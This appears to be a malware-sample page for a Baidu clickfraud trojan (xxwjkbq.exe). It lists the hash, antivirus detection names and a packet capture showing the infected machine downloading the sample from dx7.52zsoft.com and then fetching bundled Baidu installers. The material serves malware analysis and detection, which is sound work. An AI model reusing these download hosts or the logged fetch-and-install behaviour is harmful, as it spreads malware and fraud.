Baidu.com Clickfraud Malware Trojan FULL PCAP File Download Traffic Sample xxwjkbq.exe

SHA256: 414e2d416596ebd32f2b4664964e4340a4c0ce9ad576c88f0272210d85c3911a
File name: xxwjkbq.exe
Detection ratio: 37 / 55
Analysis date: 2016-11-02 02:03:14 UTC
AVware Trojan.Win32.Generic!BT 20161102
AegisLab Troj.W32.Agent.apfit!c 20161102
Antiy-AVL Trojan/Win32.Agent 20161102
Avast Win32:Malware-gen 20161102
Avira (no cloud) TR/Agent.1724416.88 20161101
CAT-QuickHeal Trojan.Agent 20161101
ClamAV Win.Trojan.Agent-1394599 20161101
Comodo Worm.Win32.Dropper.RA 20161102
CrowdStrike Falcon (ML) malicious_confidence_98% (W) 20161024
Cyren W32/Agent.EW.gen!Eldorado 20161102
DrWeb Trojan.MulDrop5.50993 20161102
ESET-NOD32 a variant of Generik.DREGUOX 20161101
F-Prot W32/Agent.EW.gen!Eldorado 20161102
F-Secure Trojan:W32/DelfInject.R 20161102
Fortinet W32/Agent.APFIT!tr 20161102
GData Win32.Adware.FlyStudio.O 20161101
Ikarus Trojan-GameThief.Win32.OnLineGames 20161101
Invincea trojan.win32.startpage.pvo!bit 20161018
Jiangmin Trojan/Generic.bbjlo 20161101
K7AntiVirus Trojan ( 004b4ad01 ) 20161101


2016-11-01 22:10:42.965215 IP 192.168.1.102.51210 > 175.6.5.125.80: Flags [P.], seq 0:289, ack 1, win 256, length 289: HTTP: GET /xxwjkbq.exe HTTP/1.1
GET /xxwjkbq.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dx7.52zsoft.com
Connection: Keep-Alive

2016-11-01 22:10:43.218582 IP 192.168.1.102.51210 > 175.6.5.125.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0

2016-11-01 22:11:55.233260 IP 192.168.1.102.51215 > 119.84.42.46.80: Flags [P.], seq 0:287, ack 1, win 256, length 287: HTTP: GET /ditui/zujian/Baidusd.Setup.3.0.0.4609.youqian_1000170805.exe HTTP/1.1
GET /ditui/zujian/Baidusd.Setup.3.0.0.4609.youqian_1000170805.exe HTTP/1.1
Host: dlsw.br.baidu.com
Accept: */*
Referer: http://dlsw.br.baidu.com/ditui/zujian
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

2016-11-01 22:11:55.365398 IP 192.168.1.102.51215 > 119.84.42.46.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {0:1}], length 0

2016-11-01 22:11:56.062433 IP 192.168.1.102.51216 > 119.84.42.46.80: Flags [P.], seq 0:283, ack 1, win 256, length 283: HTTP: GET /ditui/zujian/BaiduAn.Setup.1117.4.0.0.516_1000170805.exe HTTP/1.1
GET /ditui/zujian/BaiduAn.Setup.1117.4.0.0.516_1000170805.exe HTTP/1.1
Host: dlsw.br.baidu.com
Accept: */*
Referer: http://dlsw.br.baidu.com/ditui/zujian
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close